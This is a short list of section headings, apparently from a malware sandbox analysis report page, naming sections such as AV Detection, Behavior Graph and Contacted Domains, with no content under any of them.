Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs